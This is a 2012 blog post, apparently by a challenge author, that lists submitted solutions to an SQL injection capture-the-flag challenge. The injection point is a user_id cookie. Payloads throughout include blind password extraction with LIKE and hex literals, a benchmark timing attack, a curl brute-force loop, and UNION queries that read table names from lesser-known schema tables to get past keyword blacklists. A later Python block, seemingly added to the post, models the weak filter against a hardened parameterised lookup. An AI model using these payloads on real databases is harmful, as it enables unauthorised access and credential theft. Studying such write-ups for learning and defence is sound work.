Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed out on the series of SQL Injection challenges I released a few months ago, they are currently still online and available to try out. There are 3 challenges, each with part A and B. Out of all the challenges, challenge 2A ended up being one of the easier ones and since the solutions didn't vary too much, I decided to pick this challenge to be the first to show the solutions to.



DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the other challenges is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges and the cookie user_id is created. The cookie user_id, as the name says, has the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message will now display admin as the username with administrator privileges. This is an indication that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is in the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAFs rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order to obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically, there are several other tables we can obtain the table/column names from besides information_schema.tables/columns, which are the two widely known ones. The only condition is that some of them require the table/column to have a key, and since every table should have a primary key, the chances are high that this will work. Some examples are:





Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations, what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:




Solution omitted as it can be used to solve challenge 2B.

First Category


user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))


user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.


user_id=0 and username=0x656c25


user_id=-1 OR password LIKE BINARY 0x{chars}25


user_id=0 and password like binary 0x456c25

Submitted a Python script found here.


user_id=0 and password like 0x[blind-here]25


userid=0 and password >= BINARY 0x41


for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:


Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 
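To make the defensive point of the filter design and of the solutions above concrete, here is an added example (not the challenge's own PHP, nor any submitter's code) that models the challenge's blacklist plus an approximation of mysql_real_escape_string(), and beside it an allow-list integer check with a parameterised lookup. It assumes an in-memory SQLite table as a stand-in for the challenge's MySQL users table and a simplified escaping function.

```python
import re
import sqlite3
from typing import Optional

# The challenge's own blacklist, as quoted in the post.
BLACKLIST = ("tables", "columns", "(", ")")

def escape_string(value: str) -> str:
    """Approximation of mysql_real_escape_string(): backslash-escapes quotes,
    backslashes and NUL. It never touches digits, spaces, keywords or 0x literals,
    which is why a numeric injection point is unaffected by it."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", value)

def challenge_filter(cookie_value: str) -> Optional[str]:
    """The weak defence described in the post: keyword blacklist, then escaping.
    Returns the string that would be concatenated into the query, or None if blocked."""
    lowered = cookie_value.lower()
    if any(bad in lowered for bad in BLACKLIST):
        return None
    return escape_string(cookie_value)

def hardened_user_id(cookie_value: str) -> Optional[int]:
    """Allow-list validation: a user id is a short decimal integer, nothing else."""
    return int(cookie_value) if re.fullmatch(r"\d{1,10}", cookie_value) else None

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's users table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, privileges TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(0, "admin", "administrator"), (1, "guest", "guest")])
    return conn

def lookup_user(conn: sqlite3.Connection, cookie_value: str) -> Optional[tuple]:
    """Hardened lookup: validate first, then bind the id as a parameter so the cookie
    can never change the query text. A plain integer id in a cookie is still
    user-controlled, so a complete fix also keeps the id in a server-side session."""
    uid = hardened_user_id(cookie_value)
    if uid is None:
        return None
    return conn.execute("SELECT username, privileges FROM users WHERE user_id = ?", (uid,)).fetchone()

if __name__ == "__main__":
    for cookie in ("1", "0 and password like binary 0x456c25",
                   "-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3"):
        print(repr(cookie), "-> filter:", challenge_filter(cookie), "| hardened:", lookup_user(demo_db(), cookie))
```

Running it shows that the blacklist and escaping pass the hex-LIKE and TABLE_CONSTRAINTS payloads through untouched, while the integer allow-list rejects anything that is not a bare id.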




A full list of the victors for each challenge is available here.
